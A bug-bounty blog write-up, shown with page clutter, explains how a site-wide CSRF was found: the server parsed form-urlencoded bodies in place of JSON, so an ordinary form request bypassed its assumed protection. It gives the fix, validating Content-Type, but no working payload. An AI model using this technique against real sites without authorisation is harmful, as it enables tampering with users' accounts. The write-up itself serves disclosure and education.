Site wide CSRF on popular program

fellchase.blogspot.com · devanshbatham/Awesome-Bugbounty-Writeups · 6 hours ago · vulnerability
0 net
Tags
api-security aws bug-bounty cloud csrf facebook writeup xss
Site wide CSRF on a popular program Skip to main content Site wide CSRF on a popular program Get link Facebook X Pinterest Email Other Apps Wednesday, February 05, 2020 I found this bug in the same program that I explained in this post " Authorization bug every bug hunter missed " I was moving through another target on this program when I noticed that there was no CSRF protection like there were no tokens etc so I wondered what they were using to prevent CSRF, I noticed some high entropy strings in headers but request worked without those headers as well so that wasn't protecting the website from CSRF. Request body consisted of JSON objects basically {key: "value"} pairs the assumption behind using it was that in a typical CSRF attack attackers don't send JSON payloads, so using JSON will naturally protect the application against CSRF. Here's where the trick comes in, It's actually more of check that you should perform while trying to find CSRF bugs, I spotted it on Twitter first you may or may not be familiar with it, here's how it works. It's very simple assume that server side framework is expecting some JSON input by default in the HTTP Request body so if it detects JSON object it will automatically parse it. But even if you send regular Content-Type that is application/x-www-form-urlencoded then also it will automatically parse that and start using it, problem is caused by not checking the Content-Type, it should be strictly application/json if you're expecting JSON input. So in this case to trigger CSRF I just sent regular CSRF payload but due to their negligence of not validating Content-Type header to be strictly JSON server accepted the regular HTTP parameters and triggered the CSRF.
primaryPhoneType
firstName
This could have been prevented by validating Content-Type header to be application/json In my case the server was accepting regular HTTP Post parameters along with expected JSON, so I reported the bug, but my report was marked as duplicate 😩 against someone who reported site wide CSRF using Flash. If you find JSON objects without CSRF protection being passed around in HTTP body try to change it to regular HTTP parameters and see if it works, if the server side application is accepting non JSON parameters then it'll process the input and you maybe able to get a CSRF. Happy bug hunting. bug bounty write up Ajinkya Pathare Guy with a business degree interested in finance, web security and programming Get link Facebook X Pinterest Email Other Apps Comments pforprathm Wednesday, February 12, 2020 2:11:00 pm How you perform CSRF (By converting json to form body) ?? Reply Delete Replies Reply Add comment Load more... Post a Comment Popular posts from this blog Releasing Flumberbuckets: S3 Bucket Enumeration Tool for Bug Hunters Monday, December 16, 2019 Flumberbuckets is a part of suite of scripts that I'll be open-sourcing on GitHub in flumberboozle repository, scripts in this repository are supposed to aid bug hunters in hunting, automating workflows, etc. There is also another script in flumberboozle repository which is a portscanner with scan auto-save, auto-startup function called portboozle. What is flumberbuckets? Flumberbuckets is is yet another S3 bucket enumeration tool which you can choose to use while hunting on bug bounty programs or during security assessment. I designed this tool to serve my purposes and now I am open-sourcing it, there are several different tools that exist for people with different tastes. The aim of this tools was to present S3 bucket enumeration results in better format which is visually more appealing than scrolling through output of a bash script that just runs aws s3 ls in a loop. How does it work? Flumberbuckets is a really simple script which combines the best of existin... Read more Authorization bug that every bug hunter missed on a popular program Sunday, December 15, 2019 A story of broken access control bug I found while hunting with my friend who is a top bug hunter, huge thanks to him for sharing scope of this private program, as it is a private program I'm forbidden from disclosing name of program and the person. It started on a fine evening when my friend asked me to collaborate with him on a private program for fun and my learning. We were chatting & I was learning his methodology & how he approaches targets, in a few minutes he found few XSS on a sub-domain but that was OOS then he demonstrated how he generally checks everything, meanwhile I was struggling to keep pace with his findings and replies on chat meanwhile I had just signed up for an account on the site and Burp was logging all the traffic. After a while he was done finding XSS & CSRF and went offline I was also kind of demotivated after he went offline thinking that program being so old and popular among bug hunters there will not be any low hanging fruits esp... Read more Ajinkya Pathare Guy with a business degree interested in finance, web security and programming Visit profile Archive 2020 1 February 1 Site wide CSRF on a popular program 2019 2 December 2 2017 5 June 2 May 1 April 2 Show more Show less Labels Arch Linux Installation broken access control bug bounty Linux tools typecatcher write up XFCE Total Pageviews Social Media Follow @fellchase Tweets by fellchase
← Back to stories